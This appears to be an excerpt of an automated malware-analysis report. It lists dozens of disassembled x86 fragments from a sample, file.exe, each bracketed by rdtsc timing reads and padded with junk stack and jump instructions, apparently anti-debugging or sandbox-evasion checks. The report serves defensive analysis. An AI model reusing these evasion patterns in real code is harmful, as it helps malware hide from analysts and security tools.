                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC38B8 second address: EC38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Ch 0x00000009 push esi 0x0000000a pop esi 0x0000000b jbe 00007F5408C21106h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F5408C21106h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC38DF second address: EC38F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5408F96891h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC38F9 second address: EC38FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECAF72 second address: ECAF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECAF78 second address: ECAF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECE0AB second address: ECE0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECE0B3 second address: ECE0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECE0B7 second address: ECE0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECE0BB second address: ECE0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECE0C7 second address: ECE0ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96897h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F5408F968A3h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDD6F second address: ECDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDD75 second address: ECDD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDD79 second address: ECDD7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2149 second address: ED2151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1A96 second address: ED1A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1A9D second address: ED1ACD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408F9689Bh 0x00000008 jmp 00007F5408F96895h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5408F9688Fh 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1DEA second address: ED1DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5408C21106h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1DF8 second address: ED1E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5408F96886h 0x0000000a jmp 00007F5408F96892h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1E16 second address: ED1E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5408C21119h 0x0000000b jmp 00007F5408C2110Fh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED678D second address: ED6791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6791 second address: ED67BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jno 00007F5408C21106h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F5408C2110Bh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007F5408C21106h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED67BA second address: ED67BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED67BE second address: ED67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C21116h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E890F3 second address: E890F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E890F9 second address: E89105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89105 second address: E8910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8910C second address: E89171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5408C21108h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 movsx ecx, dx 0x00000027 mov edx, dword ptr [ebp+122D2232h] 0x0000002d mov ebx, dword ptr [ebp+1248A2EEh] 0x00000033 jnl 00007F5408C2110Eh 0x00000039 add eax, ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jbe 00007F5408C2110Ch 0x00000044 js 00007F5408C21106h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89171 second address: E891E3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5408F9689Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D1EB4h] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F5408F96888h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f pushad 0x00000030 pushad 0x00000031 mov di, cx 0x00000034 popad 0x00000035 xor ecx, 6E4C7F55h 0x0000003b popad 0x0000003c mov edx, dword ptr [ebp+122D3630h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5408F96891h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6CFB second address: ED6D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6D01 second address: ED6D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96898h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7786 second address: ED77A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21115h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jno 00007F5408C21106h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9D8D second address: ED9DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DA0 second address: ED9DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DAA second address: ED9DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DAE second address: ED9DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ah 0x00000007 jmp 00007F5408C21110h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DD2 second address: ED9DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DD6 second address: ED9DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDCAC second address: EDDCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCF2B second address: EDCF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD077 second address: EDD088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD088 second address: EDD0B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F5408C21106h 0x00000009 jmp 00007F5408C21118h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F5408C21106h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0B2 second address: EDD0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0D6 second address: EDD0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5408C21116h 0x0000000b jno 00007F5408C21106h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0FF second address: EDD121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96896h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jl 00007F5408F96886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD256 second address: EDD275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5408C21106h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jmp 00007F5408C2110Ah 0x00000012 jp 00007F5408C21112h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD275 second address: EDD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD27B second address: EDD286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6AF second address: EDD6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5408F96898h 0x0000000f ja 00007F5408F96886h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6D7 second address: EDD6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD82B second address: EDD835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD835 second address: EDD83F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21120h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5205 second address: EE5209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5209 second address: EE5218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F5408C21106h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5218 second address: EE521E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE521E second address: EE5230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jnp 00007F5408C21106h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE319C second address: EE31A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE370D second address: EE3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A37 second address: EE3A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A3D second address: EE3A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A43 second address: EE3A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40E4 second address: EE40EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40EA second address: EE40EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40EE second address: EE4123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F5408C21118h 0x00000012 jmp 00007F5408C2110Ch 0x00000017 jp 00007F5408C21106h 0x0000001d jmp 00007F5408C2110Ch 0x00000022 popad 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4123 second address: EE4154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Fh 0x00000009 popad 0x0000000a jmp 00007F5408F96895h 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F5408F96886h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4154 second address: EE4158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8CED second address: EE8CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8CF3 second address: EE8D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5408C21118h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8D12 second address: EE8D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ch 0x00000007 push esi 0x00000008 je 00007F5408F96886h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F5408F9689Ch 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8D33 second address: EE8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jnp 00007F5408C21106h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E8F second address: EE8E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E95 second address: EE8E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE900C second address: EE902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96897h 0x00000009 ja 00007F5408F96886h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE902E second address: EE903E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5408C21106h 0x0000000a jng 00007F5408C21106h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE931D second address: EE9351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96897h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5408F96894h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE998D second address: EE999A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE4BB second address: EEE4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF78F2 second address: EF78F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF78F6 second address: EF7900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7900 second address: EF790A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF790A second address: EF790F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF790F second address: EF7922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jc 00007F5408C21106h 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5F97 second address: EF5FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6292 second address: EF62B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408C21112h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF673A second address: EF6762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Dh 0x00000009 popad 0x0000000a jmp 00007F5408F9688Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007F5408F96886h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF69ED second address: EF6A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F5408C2110Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F5408C21106h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A13 second address: EF6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A17 second address: EF6A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A1B second address: EF6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70C9 second address: EF70D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70D2 second address: EF70E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70E9 second address: EF70F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70F7 second address: EF7111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96890h 0x00000007 jc 00007F5408F96886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD1BC second address: EFD1C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD456 second address: EFD467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5408F96886h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
